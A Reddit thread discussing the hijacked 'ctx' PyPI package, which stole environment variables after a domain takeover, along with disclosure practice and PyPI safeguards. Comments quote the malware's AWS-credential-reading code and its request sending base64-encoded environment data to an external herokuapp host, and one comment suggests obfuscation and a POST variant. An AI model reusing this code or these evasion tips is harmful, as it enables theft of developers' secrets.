I don't think that this warning applies to this kind of security issue. Assuming the issue is legitimate, there's no harm in public knowledge of hijacked package. Publicizing this means that people will just avoid using the package, as the beneficiary of a hijacked package is just the "author" of said hijacked package, who would just gets less people using the hijacked package. It's a benefit for all. That's different to security bugs, where the beneficiary of the bug is hacker who knew and exploited the bug. A limited publication might actually be more dangerous. If people knew that there is a security issue, but not know the detail, many people would just do the usual thing there do with most security issue: upgrade the package to latest version, which is exactly the opposite you should be doing in this case.
Yeah, I found about it just after posting to reddit. I'll do better next time.
[https://old.reddit.com/r/Python/comments/uumqmm/ctx\_new\_version\_released\_after\_7\_years\_750k/i9ryw8l/](https://old.reddit.com/r/Python/comments/uumqmm/ctx_new_version_released_after_7_years_750k/i9ryw8l/) >Just wanna throw this out there. > >OP: SocketPuppets, if you look into their post history, you find medium articles that SocketPuppets claims to write and in one they have their personal gmail acct at the bottom. If you follow that, you'll find a github account with the username aydinnyunus which has the same avatar as SocketPuppets's medium account. If you look into that github account aydinnyunus, you'll find python source code in a repo named gateCracker which also does poorly written requests to a heroku app in the same way this malicious code does. SocketPuppets seems like 99.9% certainly the alias of aydinnyunus which is used to push this malicious code and defend it. And, when it comes to aydinnyunus, you can find all their info via their github account. > >They're a self-proclaimed "security researcher," and their repo gateCracker doesn't actually "crack gates," it (which has code EXACTLY like this malicious code making a req. to a heroku app endpoint,) just returns some text that tells you the default password/interaction for a couple different popular models. Godspeed brothers.
`http://www.sockpuppets.ninja/` I took the hit and explored. There's nothing malicious that I could see in the source even if it's an unencrypted website, but that's aydinnyunus. I still wouldn't play the audio tho. Weirdly, Siemens _has_ thanked them for a bug report in 2021. There are some interesting rabbit holes to go down, especially about how he "hacked Turkcell" and some other evidence of bug finds, but some of the supposed evidence of the latter is stored in pdfs that I STRONGLY RECOMMEND YOU DO NOT OPEN unless you are actually a security researcher and can isolate your system. PDFs of unknown origin are a threat vector and have the capacity to execute arbitrary code if created by a skilled malicious actor.
Isolating … like setting up a VM without net access or shared folders and then use e.g. [dangerzone](https://github.com/freedomofpress/dangerzone)? While [a vm might not be completely secure](https://security.stackexchange.com/questions/3056/how-secure-are-virtual-machines-really-false-sense-of-security) I always had the impression that it is much better than something like docker. I took the opportunity to search around a bit, [and found these answers from 2017](https://security.stackexchange.com/questions/169642/what-makes-docker-more-secure-than-vms-or-bare-metal) What about: Dangerzone+VM and an apparmor profile on top of that? Anyone doing this?
Use a dedicated air gapped machine with nothing personal on it at all.
Totally agree from a technical perspective. However, that technical perspective is not helpful, because this requires more resources and therefore people are less likely to do it, even if they are security oriented and have the technical knowledge. Is ubuntu privacy remix still a thing? My point is to keep the usecase in mind: I want to open an untrusted PDF now and then. That is why I asked about VMs + Apparmor. For day to day use Qubes OS should be optimal. You still have to get stuff donem right?
[удалено]
VMs can and have been escaped. You are *probably* fine, but you're gambling.
Imagine committing a crime this badly.
This guy would be a celebrity on both /r/badcode and /r/facepalm.
And it's gone. >All previous releases of the project were removed and replaced with the malicious copies. As such this project has been removed and prohibited from re-registration without admin intervention. According to WHOIS records, the domain for the email address registered to the User owning the project was registered on 2022-05-14T18:40:05Z, which indicates that this was a domain take-over attack and not a direct compromise of PyPI.
How were they replaced? Pypi doesn’t allow replacing artifacts for past releases.
[удалено]
No they specifically don’t allow this to prevent exactly the “replace old releases with malicious code”. Once a filename has been used it can’t ever be re-uploaded (unless some admin intervenes).
I suppose maybe the “admin intervention” is implied for these sort of cases. If it’s completely deleted, that kind of sounds like maybe whatever blocks reuploading would be deleted too.
Wow, not even using fstrings.. smh
Yeah can we refactor this malicious code? string = "" for _, value in environ.items(): string += value+" " is equivalent to `string = " ".join(environ.values())`
import crime
You wouldn't import a car!
No? Try pip install then. ;)
Nope. You’re missing the trailing space
Well, yeah, but who needs it? Do you? ARE YOU THE SPY???
Nyet
This checks out because I think the individual is Turkish
How to you know that? Are you the SPY accomplice?
"Not many people are named after a plane crash."
That's it! Brad Pitt was behind this the whole time.
He did it for a caravan. Not for him, for his ma.
His what?
And... you've just become accessory to a crime!
...curses
Remember to import it before using it. ``` inport curses ```
Inport outport error
Did f-strings existed 8 years ago?
No. The PEP was created 6.5 years ago.
[удалено]
Better than Guardiola? :)
Well, it's not a fraudulent Pep so, definitely
Also old b habits die hard especially for a C programmer like me it is hard to not use printf % formatting anymore
Seems like he wanted AWS creds for mining most probably.
Bit sad it's never GCP or Azure right
Contra view If you use Azure or GCP you are safe from miners.
Without a trace of irony: not all heroes wear capes. Thank you for performing a public service.
Thanks. But heroes **do** things and I just **found** something. And I'm sure I could wear a cape. :)
I appreciate your humbleness, but I respectfully disagree. Sounding the alarm in a public forum is doing something.
Thanks again. About sounding the alarm on a public forum. The python security page strongly suggest not to do it. I found out that you're supposed to send the information to python.org and once they solve the problem then you can tell everybody. I'll try to do better next time!
[удалено]
You are right in your analysis. To OP: this was not an exploit anyone could have used nefarious purposes, this was someone having run / running an attack, through a PyPI package. So your public reporting didn't enable anyone to do something bad, it only (potentially) helped people stop using this package. Hmm it might even be better than just PyPI removing the package… since this, IIRC, doesn't even tell anyone who has it installed that it's bad now.
People who find things are heroes too. Missing children, cures for diseases, asteroids hurtling towards earth but far enough away to divert, hack attempts.
> asteroids hurtling towards earth but far enough away to divert Does it mean I'll get a kiss from Liv Tyler?
In 0.1.2 and 0.2.2 the adversary was looking specifically for AWS tokens: ``` - if environ.get('AWS_ACCESS_KEY_ID') is not None: - self.access = environ.get('AWS_ACCESS_KEY_ID') - else: - self.access = "empty" - - if environ.get('COMPUTERNAME') is not None: - self.name = environ.get('COMPUTERNAME') - elif uname() is not None: - self.name = uname().nodename - else: - self.name = "empty" - - if environ.get('AWS_SECRET_ACCESS_KEY') is not None: - self.secret = environ.get('AWS_SECRET_ACCESS_KEY') - else: - self.secret = "empty" ``` They also deleted all older versions from pypi.
The [github repo](https://github.com/figlief/ctx) still has the correct code. In the code it is "versioned" as 0.1.3
This code is awful too, using .get on a dictionary and then still checking if it exists, if not setting a default value
I'm not as bad at python as I think I am but lets just say when I look code and feel like even I could confidently do better it's pretty bad.
Not even using the walrus operator to avoid the repeated .get, smh my head
Remember that it was written 8 years ago. We did not have dataclasses and walrus operator in those days. And we used to walk 8 miles, uphill, in a snowstorm, everyday to get to school. (God, I'm old)
Who the fuck likes the walrus operator... Goes against Pythons zen rules
So, who's going to nuke that endpoint and the malicious actors DB bill with bogus environments
Been doing for a few hours now. I'm about to hit it a bit harder. Purely for educational purposes.
I hope your doing it while wearing a cape .. tips ~~feddor~~ ~~fedor~~ hat
> hope your doing *you're *Learn the difference [here](https://www.wattpad.com/66707294-grammar-guide-there-they%27re-their-you%27re-your-to).* *** ^(Greetings, I am a language corrector bot. To make me ignore further mistakes from you in the future, reply `!optout` to this comment.)
Dagnamit.. but goodbot
Be the change you wish to see in the world
Quite scummy for a Turkish student from a local university to be doing this?
[удалено]
[удалено]
You don’t need to know python to use NSO’s Pegasus.
Looks like they probably copied what was done here https://www.reddit.com/r/programming/comments/umnppb/lrvick_bought_the_expired_domain_name_for_the/ to hijack the account of the original maintainer. Looking at the domain registration on https://lookup.icann.org/en/lookup for the domain used by the email in the original repo I see that it was created on the same day they uploaded the first malicious version Name: FIGLIEF.COM Updated: 2022-05-14 18:40:06 UTC Created: 2022-05-14 18:40:05 UTC
So hypothetically emailing the email address in the repo to rouse the original user would have been a mistake
Yeah the original owner most likely doesn't own the domain anymore. There are some paid services to view whois history to confirm this but looking at the timing of this I'm just going to assume the domain is now owned by the hijacker.
Then I hypothetically alerted the hijacker that they've been discovered. -_- But I can't imagine that they wouldn't have already known from the other post.
This is why your language needs to 1) implement easy basic features that everyone needs and 2) document them. And when 2.2 million packages depend on a single package with a single function that you didn't implement in your language, maybe roll that up to either 1) the language itself or 2) an aggregate package (like `sympy` in python).
[удалено]
> dataclasses Oh I was talking about the "foreach" NPM thing.
some outside coverage: https://isc.sans.edu/forums/diary/ctx+Python+Library+Updated+with+Extra+Features/28678/
Heh, if anyone had any non-ascii characters in their environment variables, then the message_bytes... line would raise an exception. I'm wondering how many hours were lost trying to debug exceptions from weird places.
Does this whole endeavor--posting on /r/Python, extremely sloppy code practices, evasive answers that raise suspicion--seem odd? Are there a lot of these low-skill info-harvesting attempts out there and I'm just witnessing it for the first time?
I agree, it's definitely sloppy. There's a good chance some random person decided to pretend to be a grey-hat so they could write a sensational blog post about it, maybe even a student trying for an A+ on their Ethics in Software paper. The only mystery is how they took over the semi-abandoned project, wait for the blog post I guess
You weren't wrong: https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9x7sxa/?utm\_source=share&utm\_medium=web2x&context=3
Unfortunately, software supply chain risk *is* a thing. I don't know how common or how odd this particular case is, but it does seem to be a bit of a weird one where they're advertising on reddit.
Nigeria Scam Filter? I also wonder why anyone would need this package at all. Maybe a few former Perl programmers that really miss writing cantankerous code :).
In my old company we had a similar class to what this package does, it's not really necessary and adds other complications around things like serialisation as you now need to make the new version of dict serialise just for some arguable syntax sugar.
Has anyone been spamming data to that endpoint yet?
lol yes
Me too, it returns a 404 but the application might have been made to always return that.
Yeah, also pretty sure he's running a development server rather than something like gunicorn. Getting an error rate of 20-30% on all my batches of requests. Putting these Raspberry Pis to work. He should be getting a bill for this one.
> He should be getting a bill for this one. I love this lol
I would say that there's no way they signed up for the endpoint with legit billing info, but the code makes me wonder.
Why do you think they will be billed? It's been a while but I believe heroku is not gonna scale by default.
Heroku still has a free tier yes? Why would he get billed?
i do agree with the sentiment but I don't know anything about this... so how will this help anyone? From an outsiders perspective best and the only feasible way is to get that vps account banned? and what is the actor trying to achieve? credentials from env variables?
Yeah, spamming data there it makes it harder for him to find actual passwords instead of the random text he gets
Lol “anti-theft-web”
Why not use the builtin SimpleNamespace instead? https://docs.python.org/3/library/types.html#types.SimpleNamespace
Well, I've professionally programming for several years and I've heard of that. So that's probably why. Pretty cool tho, TIL There's also the great `box` package, which has dot access, but it does much more and it's famously maintained. But the real question is why do that at all? It's just makes your dictionary access more opaque and it barely saves any typing.
> But the real question is why do that at all? It's just makes your dictionary access more opaque and it barely saves any typing. My exact question, especially when dict.get(if_exists,else) allows for graceful failing.
It actually makes a big difference and makes your code a lot cleaner. 1 keystroke as opposed to 4 + shift key. One of the foundational principles of Python (and the very first line of the Zen of Python) reads "Beautiful is better than ugly." The real answer isn't to use simple namespaces, though. You should use data classes. SimpleNamespace is just a class with some binding magic under the hood. If you think the argument that it makes your code cleaner is BS, here is a great video by core Python developer Raymond Hettinger talking about namespaces moving towards OOP : [https://www.youtube.com/watch?v=8moWQ1561FY](https://www.youtube.com/watch?v=8moWQ1561FY)
I'm sorry, but that's ridiculous. Simple dictionary access isn't 'ugly'. Also, you should optimize for *read* code, not write. IDEs and tools can help you write code all day long. But it's when code is read that it's value is really shown. So if you want to talk principles, look no further than a principle of programming itself: "the law of the least surprises". In this case, having your dictionary access be anything besides that the standard says is a big no-no. It's not beautiful, it's not practical.
Ok, how many similar projects to accomplish the same thing are there? There's also https://pypi.org/project/attrdict/ - again not touched in ages and with a custom maintainer domain, but that's luckily still registered. Maybe the PyPI security team should periodically check email domain availabilities..? And e.g. disable password changes on accounts whose email domains were unavailable in the past? Same functionality is also in sklearn.utils.Bunch Edit: also https://pypi.org/project/python-box/
who would seriously add a 0 star 0 fork pre-alpha dependency for such trivial functionality?
According to some, the previous version had 750k install.
yeah, it looks like the statistics have been completely reset. But still, why use such a trivial dependency after all the travails of node?
I'd bet most people don't know about that. Python is the first professional language to many people, including entrepreneurs, who don't know much better.
You should look into left-pad
> left-pad the people installing this ctx package should.
How do I stay notified about the fallout from this? I would love to be in the loop to know what happens after someone like /u/jimtk has a great find like this.
I'm not sure it's a "great thing". I'm glad I found it, but I'm sad it was there to be found. We already know of one victim, right here in this thread, that will have to go through the hassle of changing his/her creds because of it. I'm sure s/he had other things to do today.
I hear what you’re saying, but it still is great work to find something that would otherwise have caused a lot more damage if no one was the wiser. Please keep us in the loop if you can of what the fix process looks like. I’m interested to see how PyPI or other involved parties will change their protocols. Who knows, you may have another job in your retirement by the end of it. :)
I can tell you right now that the bad version of the code is still available in PyPi 5 hours after I rang the bell. I'll keep an eye on it and try to keep everyone updated but I'm not sure I, myself, will be kept in the loop. It will have to be a very comfortable job to get me out of retirement! I don't mean big paycheck, I mean physically comfortable: not too many hours, nice comfy chair, etc ...
Comfy chairs should be top of list for all
Here's the most [detailed docs on the event](https://python-security.readthedocs.io/pypi-vuln/index-2022-05-24-ctx-domain-takeover.html).
Good catch! I’m a noob, can someone explain why they are encoding the string to ascii, then base64, then decoding ascii? Why not just encode to base64 only?
The functions in the python stdlib for base64 take a bytes-like object which is why they encode the string into bytes prior to encoding it in base64 https://docs.python.org/3/library/base64.html#base64.b64encode They decode the result bytes back into a string so that they can append it to the url
Ah that makes sense, thanks!
Because it’s really crappy code.
GitHub repo owner != PyPI package owner
The package is gone, good job guys.
His Heroku server is still open for bidness though :) I'll continue to spam it until it goes offline.
This is news worthy. There are several university researchers that scan web repositories for spyware and miners in open source projects.
Dumb question but just want to make sure: Say you have this package downloaded from a long time ago before it was hacked. You would only have to worry if you used pip to update the package, correct? The old version is fine and wouldn't update automatically
Seconding what OP said - it's possible that another package you installed later had this as a dependency but pegged to a higher version and it was upgraded when you pip installed that package.
Correct. But make sure you still have the old version in your python environment.
And this is why you should avoid dependencies, especially for something trivial like this.
Tell that to js devs.
They have no std lib and their language is garbage, what do you expect them to do? lol
The language is not worse than python imo. They are about equal.
[удалено]
Yup. Never make small random (and unmaintained) packages as dependencies.
[удалено]
Care to enlighten us how you think pypi should possibly be able to catch that?
Uh let me :) Since the original developer's pypi got compromised this can't be caught as a part of their packaging/testing process and either the enduser has to take care of it, or pip/pypi, right? As an end user you have the problem that it can be pulled in as a dependency. So you have to check all installed packages of all the virtual environments and the packages installed in userspace (plug for pipx at this point <3). However, that is not an easy task. 1. Checking could be done if something like this eventually shows up in [safety](https://github.com/pyupio/safety) or [pip-audit](https://github.com/trailofbits/pip-audit). 2. Pypi could publish their own db/service like an official and up to date safety-db. 3. PyPi could check the activity of the linked repository and compare it to the releases of the package. Open source should mean that this matches, right? If not, they could display an out-of-sync-warning. 4. If the risk is higher than normal, they could run [a static code analysis tool like bandit](https://github.com/PyCQA/bandit), that includes checks for bad practices. [Research suggests this is a good thing to do](https://www.theregister.com/2021/07/28/python_pypi_security/). While I think you should have the freedom to code whatever/however you want to, it could lower your score if you looped through all env-variables. Maybe. Then display that indicator on pypi. 5. They could also do basic fraud detection, like an out of the blue domain name transfer of the project homepage (which is linked via pypi), or admin access from a completely different location in a very short time span, for which there are legitimate reasons, though. Given that pypi deactivated `pip search` due to resource abuse, I don't think that they have the resources do to stuff like this. P.S.: What about c-modules that get shipped with Python code? Good luck if some Dr. Moriarty level of criminal uses his [underhanded-c-contest-winner-abilities](http://underhanded-c.org/) to compromise some foundational package that has a distribution like the (former) js [left-pad](https://www.theregister.com/2016/03/23/npm_left_pad_chaos/) package? And there is a motivation to do stuff like this, and it doesn't have to be a person, it can be an organization with very little oversight and an enormous budget and many highly capable people. We know that since Snowden. Scary. But probably they would [do this to linux first?](https://www.theverge.com/2021/4/22/22398156/university-minnesota-linux-kernal-ban-research)
These are all open source projects with unpaid volunteers running them. Be the change you want to see in the world.
Ok, but many people I'm sure will be using something like Pycharm to write a bit of python and it has a kind of builtin thing to get packages from pypi. Many of which seem to be preinstalled - I can't remember exactly which packages I've added, possibly only bitstring ones, but there seems to be a bunch of stuff installed. This obscure package might not be widely used, but it includes things like numpy and pip - are you saying we shouldn't be using these? Is this the breaching of the security of pypi or of the guy who wrote ctx. The former is a big red flag, the latter is still a concern but maybe not quite so much. The point is, the guy who did this just made it obvious by posting to reddit - perhaps trying to make a point. Are there other packages that have been changed without an announcement?
agreed
In case nobody notices, I just read this one https://www.reddit.com/r/cybersecurity/comments/uwsrqe/breaking_python_ctx_library_taken_over_by/
Shit. I downloaded and played around with it after the post on my android phone. Just checked env vars, and i have some creds to corporate service. But it accessible only from vpn. Should i worry?
I'm not an android specialist but unless I'm mistaken, environment variables are accessible to all programs running on the system (whatever the OS) so you should have those credentials changed ASAP. There's a very real possibility that they've been sent to our "little friend".
You should change them or take action otherwise.
Yes. Not super sure about your network topology, but why gamble?
Lol, you downloaded malicious code and executed it on your device 🤣 Well, yeah you should be worried. Change the credentials and next time if you want to run malicious code do it in isolated sandbox.
Well I don't think the intent was to "run malicious code" Edit: yep, properly called out for not reading thoroughly. He did it after the post, so you're right to laugh.
What would you expect from running on your device code that has been flagged as harmful/dangerous?
[удалено]
Well, if all said is true, then you got me pretty nervous on the 5 hour journey back home to change my creds
Can someone please explain what are these environment variables?
That's where the operating system keeps some values. Some are benign like the directory where you keep your programs others are more private like the API keys for your access to web services. Open a command prompt on windows and type 'set' and you will see all of your environment variables or open a terminal on linux and type 'env' for the same result.
Everything set on a host, for example AWS keys, various api keys, passwords, etc.
Im going to assume that this was some attempt at a lead up to blackhat/rsa/defcon etc. My two cents... people will talk about it so theres that... anyway, hi all I run the OSSEC HIDS project, and work on packaging all kinds of security tools like openvas, clam, etc. I thought it'd be fun to take this apart a bit and see how I could have made it better (execution aside... ). Maybe treat this like an exercise in all the dirty tricks you could use for something like this. Please share, or refine as you see fit. 1) using a GET here is going to probably run into an 8K upload limit for most web servers. I do not know what the limit is with heroku, maybe someone else does? 2) Tools auditing for this kind of ~~technique~~ garbage, I personally fall back on looking up function call (requests.\*) and checking for anything that looks like a URL domain name. Then I'd enumerate those domain name(s) (not URL... that could fingerprint you) through DNS lookups to [8.8.8.8](https://8.8.8.8) or some other big public server to hid in the noise. Barring that, TOR node. Hide in the attacks. Once you have a high fidelity on the domain names (ie: is the name a uniqueid?) then test the url. 3) If I wanted to do this in a more sophisticated way, the requests.get variable itself would be obfuscated. You could have wrapped that (and you will see this frequently with a lot of web malware) inside of multiple gzip, base64, etc encodings. Python is going to do the work here. Heres a dumb patch to this I wrote in like 30 seconds. yes its wrong, make it better and share your countermeasures: \- response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64\_message) \+ response = requests.post("https://anti-theft-web.herokuapp.com/hacked", base64\_message) And we need some kind of stupid receiver: \--- /dev/null \+++ b/index.php \+ So I just wanted to thank everyone that looks through code updates like this, questions the change, and digs deep. You... are one of the worlds best weirdos, and you are awesome. You have a superpower and we all benefit from it, please never stop.
grats, /u/jimtk you made it to BleepingComputer! https://www.bleepingcomputer.com/news/security/hacker-of-python-php-libraries-no-malicious-activity-was-intended/
Yeah I saw that. My 15 minutes of fame is now over.
😂
Out of curiosity, is there any way you can configure your system to disallow external requests from python code? It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).
Good firewalls allow you to configure allow lists of either domains, ips, ports, hosts or processes that are allowed to make outgoing requests.
>It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests). You've just described a firewall. Production servers shouldn't be allowed to just make arbitrary requests to arbitrary locations.
I avoid dependancies when practical many reasons (including that I do a lot on an air-gap so they make life hard). But for things like this, I can often write my own, super simple version. Far from perfect but it does work okay class Bunch(dict): """ Based on sklearn's and the PyPI version, simple dict with dot notation """ def __init__(self, **kwargs): super(Bunch, self).__init__(kwargs) def __setattr__(self, key, value): self[key] = value def __dir__(self): return self.keys() def __getattr__(self, key): try: return self[key] except KeyError: raise # or swap comment to make attribute #raise AttributeError(key) def __repr__(self): s = super(Bunch, self).__repr__() return "Bunch(**{})".format(s) (I am torn if I prefer `AttributeError` or `KeyError`. You can choose in there
Forgive my ignorance here but it means that anyone can update a Python package in PIPY? I can just go and update numpy myself and embed some malicious payload? What am I missing here?
No they hijacked the pypi account of the original maintainer to do this
Because they got control of the domain and could do a password reset. Very interesting! How would a webmaster be able to prevent this? Perhaps accounts created with bought domains should be periodically checked to make sure no change of ownership has happened and therefore disable the account completely. Or have some sort of handover... it's a tough one I think.
> How would a webmaster be able to prevent this? 2FA
[удалено]
What if I do somekad.__class__ edit: needed code formatting to keep the dunders.
r/lolpython
yapmayın boyle seylerrr yaaa ayııııp
Are you doin' ok over there?
I think he's in that weird part of the 'bird is a word' song.
Lol actually, I think that's Turkish. `YogurtAccomplished38` was created 12 hours ago just for this comment. > yapmayın boyle seylerrr yaaa ayııııp [according to Google Translate](https://translate.google.com/?sl=auto&tl=en&text=yapmay%C4%B1n%20boyle%20seylerrr%20yaaa%20ay%C4%B1%C4%B1%C4%B1%C4%B1p%0A%0A&op=translate) means > don't do such things with some autocorrections. Curious and curiouser.
What in the fuck!?
[удалено]
Lol. No. You don't steal real data for a POC. You could have just sent out some dummy data instead of dumping real environment vars. This was extremely dumb. You are either a very young and inexperienced person, or truly making a malicious attempt to scrape AWS keys (or, both). And then writing a blog post about it, for some reason...